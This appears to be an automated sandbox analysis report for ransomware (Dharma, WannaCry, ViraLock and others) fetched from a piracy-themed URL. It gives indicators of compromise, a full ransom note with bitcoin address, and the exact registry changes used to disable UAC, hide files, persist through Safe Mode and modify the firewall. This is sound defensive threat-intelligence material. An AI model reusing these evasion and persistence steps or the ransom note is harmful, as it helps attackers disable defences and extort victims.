dharma | hxxp://pirateadobe[.]com

Analysis

max time kernel
723s
max time network
726s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
25-11-2024 00:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://pirateadobe.com

Score

10^/10

dharma wannacry credential_access defense_evasion discovery evasion execution impact lateral_movement persistence privilege_escalation ransomware spyware stealer trojan worm

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\!Please Read Me!.txt

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1 Next, please find the decrypt software on your desktop, an executable file named "!WannaDecryptor!.exe". If it does not exsit, download the software from the address below. (You may need to disable your antivirus for a while.) rar password: wcry123 Run and follow the instructions! �

Wallets

15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1

Signatures

Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
ransomware dharma
Dharma family
dharma

Modifies visibility of file extensions in Explorer 2 TTPs 56 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe

UAC bypass 3 TTPs 56 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Wannacry family
wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 4 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
30688	net.exe
30764	net1.exe
17748	net.exe
17676	net1.exe

Renames multiple (551) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
31152	netsh.exe
30752	netsh.exe

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
31092	attrib.exe
31056	attrib.exe

Sets service image path in registry 2 TTPs 14 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\uxtkwqeosxxsmx\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\uxtkwqeosxxsmx.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\zedlhnnjdebbdcax\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\zedlhnnjdebbdcax.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\yaqnwaymaqqvyp\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\yaqnwaymaqqvyp.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssql\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\mssql.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\gsbozrriroibzzr\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\gsbozrriroibzzr.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\kvxrrbtxziaetsk\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\kvxrrbtxziaetsk.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mzlpcwauuwmkyeivo\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\mzlpcwauuwmkyeivo.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssql\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\mssql.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\hkspncrlmhdsqan\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\hkspncrlmhdsqan.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\dyfmjvpyzhgonjj\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\dyfmjvpyzhgonjj.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssqlaq\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\mssqlaq.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\dqqnluhvqfyngtxn\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\dqqnluhvqfyngtxn.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssqlaq\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\mssqlaq.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\miaohxhglytlyutbt\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\miaohxhglytlyutbt.sys"	mssql.exe

Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Drops startup file 7 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDFFA5.tmp	WannaCry.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDFFAC.tmp	WannaCry.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CoronaVirus.exe	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	CoronaVirus.exe

Executes dropped EXE 64 IoCs

pid	Process
6704	CoronaVirus.exe
18128	msedge.exe
11400	msedge.exe
10396	msedge.exe
10776	msedge.exe
11048	msedge.exe
11336	Dharma.exe
12060	nc123.exe
32708	mssql.exe
13724	mssql2.exe
17056	SearchHost.exe
18216	Dharma.exe
17876	nc123.exe
32100	mssql.exe
720	mssql2.exe
9672	SearchHost.exe
10212	msedge.exe
31072	msedge.exe
30396	msedge.exe
29164	ViraLock.exe
9792	bIMsAwUc.exe
28992	xCoIMcgw.exe
16996	ViraLock.exe
32520	ViraLock.exe
18588	ViraLock.exe
29520	ViraLock.exe
11168	ViraLock.exe
18840	ViraLock.exe
30068	ViraLock.exe
12976	ViraLock.exe
10820	ViraLock.exe
30532	ViraLock.exe
13412	ViraLock.exe
12404	ViraLock.exe
17964	ViraLock.exe
29428	ViraLock.exe
15776	ViraLock.exe
14572	ViraLock.exe
10588	ViraLock.exe
13648	ViraLock.exe
18852	ViraLock.exe
15220	ViraLock.exe
14040	ViraLock.exe
15376	ViraLock.exe
17984	ViraLock.exe
10832	ViraLock.exe
14504	ViraLock.exe
6680	ViraLock.exe
14052	ViraLock.exe
22052	ViraLock.exe
3704	ViraLock.exe
9908	ViraLock.exe
22284	ViraLock.exe
23080	msedge.exe
16088	msedge.exe
14392	ViraLock.exe
16284	ViraLock.exe
11864	ViraLock.exe
20924	ViraLock.exe
16096	ViraLock.exe
23576	ViraLock.exe
20080	ViraLock.exe
20568	ViraLock.exe
21444	ViraLock.exe

Impair Defenses: Safe Mode Boot 1 TTPs 20 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\kvxrrbtxziaetsk.sys	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\KVXRRBTXZIAETSK.SYS	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\HKSPNCRLMHDSQAN.SYS	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\UXTKWQEOSXXSMX.SYS	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\dqqnluhvqfyngtxn.sys	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\ZEDLHNNJDEBBDCAX.SYS	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\mzlpcwauuwmkyeivo.sys	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\yaqnwaymaqqvyp.sys	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\DYFMJVPYZHGONJJ.SYS	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\hkspncrlmhdsqan.sys	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\dyfmjvpyzhgonjj.sys	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\uxtkwqeosxxsmx.sys	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\gsbozrriroibzzr.sys	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\GSBOZRRIROIBZZR.SYS	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\DQQNLUHVQFYNGTXN.SYS	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\MZLPCWAUUWMKYEIVO.SYS	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\YAQNWAYMAQQVYP.SYS	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\zedlhnnjdebbdcax.sys	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\miaohxhglytlyutbt.sys	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\MIAOHXHGLYTLYUTBT.SYS	mssql.exe

